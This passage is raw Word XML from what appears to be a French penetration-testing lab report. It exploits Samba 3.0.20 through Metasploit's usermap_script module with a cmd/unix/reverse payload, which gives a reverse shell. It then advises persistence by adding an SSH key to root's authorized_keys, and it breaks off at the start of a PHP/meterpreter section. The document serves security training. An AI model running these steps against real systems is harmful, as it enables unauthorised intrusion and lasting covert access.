        <w:t xml:space="preserve">Version de </w:t>
      </w:r>
      <w:r w:rsidR="0016016C" w:rsidRPr="000E35DF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba : </w:t>
      </w:r>
      <w:r w:rsidR="0016016C" w:rsidRPr="000E35DF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Samba 3.0.20-Debian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A3895B" w14:textId="77777777" w:rsidR="0016016C" w:rsidRDefault="0016016C" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08981932" w14:textId="17D32BAA" w:rsidR="000E35DF" w:rsidRDefault="00D62C7C" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62C7C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hors de la console msf (dans un autre terminal), utilisons l'outil searchsploit (disponible sur Kali). Cet outil permet d'effectuer des recherches dans la base de données </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00D62C7C">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>exploit-</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D62C7C">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>db</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00D62C7C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (qui référence divers exploits et techniques d'attaques) en ligne de commande. Existe</w:t>
      </w:r>
      <w:r w:rsidR="00014435">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00014435" w:rsidRPr="00D62C7C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>t-il</w:t>
      </w:r>
      <w:r w:rsidRPr="00D62C7C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> un exploit relatif à cette version de Samba ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BE6E7" w14:textId="77777777" w:rsidR="00C72FFC" w:rsidRDefault="00C72FFC" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF36A6" w14:textId="77777777" w:rsidR="00C72FFC" w:rsidRDefault="00C72FFC" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C8B60C" w14:textId="77777777" w:rsidR="00443729" w:rsidRDefault="00443729" w:rsidP="00443729">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00443729">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="076B2A1C" wp14:editId="7647D1BD">
            <wp:extent cx="5760720" cy="820420"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:docPr id="107253356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33562" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="820420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73901C7B" w14:textId="1CD14F09" w:rsidR="00443729" w:rsidRDefault="00443729" w:rsidP="00443729">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65609E" w14:textId="77777777" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0006014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44E93756" w14:textId="2D2D3DDF" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0006014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>On utilise les commandes suivantes après cela :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920E733" w14:textId="77777777" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0006014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E61BA70" w14:textId="370D9B67" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="001D4079">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usermap_sc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FA780CB" w14:textId="095E13BF" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="001D4079">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set RHOST MACHINEATTAQUEE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18999571" w14:textId="7C7873D7" w:rsidR="0006014D" w:rsidRPr="00C86E87" w:rsidRDefault="0006014D" w:rsidP="001D4079">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Set LHOST NOTREMACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B09BB" w14:textId="107669D0" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="001D4079">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Ping MACHINE ATTAQUEE #pour voi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>r si elle est bien là</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598796E" w14:textId="757765C5" w:rsidR="00CD27EA" w:rsidRPr="00C86E87" w:rsidRDefault="0006014D" w:rsidP="001D4079">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C86E87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF1A23" w14:textId="77777777" w:rsidR="00014435" w:rsidRPr="00C86E87" w:rsidRDefault="00014435" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5C13F1" w14:textId="4520D260" w:rsidR="00014435" w:rsidRDefault="0006014D" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cela devrait avoir pour effet de lancer un shell (minimaliste). Tapez des commandes comme </w:t>
      </w:r>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour vérifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2887A1" w14:textId="77777777" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC8F243" w14:textId="77777777" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0006014D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0006014D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44029F14" wp14:editId="618FBD07">
            <wp:extent cx="5760720" cy="3288030"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="1379852130" name="Image 1" descr="Une image contenant capture d’écran, texte, Compositing numérique, Modélisation 3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2130" name="Image 1" descr="Une image contenant capture d’écran, texte, Compositing numérique, Modélisation 3D&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3288030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB1CC46" w14:textId="3ED4AF20" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0006014D">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3546B483" w14:textId="77777777" w:rsidR="0006014D" w:rsidRDefault="0006014D" w:rsidP="0006014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C69DBD" w14:textId="4880EB67" w:rsidR="007C6374" w:rsidRDefault="007C6374" w:rsidP="0006014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Faite alors Ctrl-Z ou saisissez la commande background. Cela aura pour effet de vous proposer de mettre la session en </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>. Vous pouvez listez toutes les sessions en background avec la commande sessions et vous reconnectez à une session avec la commande sessions suivi du numéro de session. Essayez</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BDD8AC" w14:textId="77777777" w:rsidR="007C6374" w:rsidRDefault="007C6374" w:rsidP="0006014D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334866D2" w14:textId="77777777" w:rsidR="007C6374" w:rsidRDefault="007C6374" w:rsidP="007C6374">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="683533A9" wp14:editId="3203E5C9">
            <wp:extent cx="5760720" cy="4318635"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="115716993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69938" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4318635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE0ED25" w14:textId="3282D278" w:rsidR="0006014D" w:rsidRPr="0006014D" w:rsidRDefault="007C6374" w:rsidP="007C6374">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA296D" w14:textId="019616F2" w:rsidR="00D62C7C" w:rsidRDefault="007C6374" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enfin profitez-en pour vous assurer un retour facile sur cette machine compromise en vous créant par exemple un accès plus discret en ajoutant votre clé publique ssh au fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> du compte root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC7016C" w14:textId="77777777" w:rsidR="00D62C7C" w:rsidRDefault="00D62C7C" w:rsidP="0016016C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7B6B12" w14:textId="77777777" w:rsidR="00A24D42" w:rsidRDefault="007C6374" w:rsidP="00A24D42">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007C6374">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49D5F6A8" wp14:editId="4F05219E">
            <wp:extent cx="5760720" cy="2204085"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="661229304"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29304" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, document&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2204085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48625C74" w14:textId="28C0117D" w:rsidR="0016016C" w:rsidRDefault="00A24D42" w:rsidP="00A24D42">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A51105" w14:textId="77777777" w:rsidR="00A24D42" w:rsidRDefault="00A24D42" w:rsidP="00A24D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3207F4" w14:textId="77777777" w:rsidR="00CD27EA" w:rsidRDefault="00CD27EA" w:rsidP="00A24D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752CF6BF" w14:textId="77777777" w:rsidR="00CD27EA" w:rsidRDefault="00CD27EA" w:rsidP="00A24D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B46CE21" w14:textId="77777777" w:rsidR="00CD27EA" w:rsidRDefault="00CD27EA" w:rsidP="00A24D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AE6D46" w14:textId="10B3F55A" w:rsidR="00A24D42" w:rsidRPr="001D4079" w:rsidRDefault="00C25C17" w:rsidP="00CD27EA">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc197957016"/>
      <w:r w:rsidRPr="001D4079">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3) Service Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4079">
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4079">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4079">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4079">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4079">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4079">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="69A7EE75" w14:textId="0A19B6B0" w:rsidR="00C25C17" w:rsidRDefault="00C25C17" w:rsidP="00C25C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C25C17">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Essayon</w:t>
      </w:r>
      <w:r w:rsidR="002E3E9D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00C25C17">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> d'abord de déterminer quelle version de PHP est utilisé sur la machine cible. L'outil </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C25C17">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C25C17">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de vérifier la présence d'un fichier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C25C17">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, j’utilise la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EFCEB0" w14:textId="77777777" w:rsidR="00C25C17" w:rsidRDefault="00C25C17" w:rsidP="00C25C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F101F0" w14:textId="11607DBD" w:rsidR="00C25C17" w:rsidRDefault="00C25C17" w:rsidP="00C25C17">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
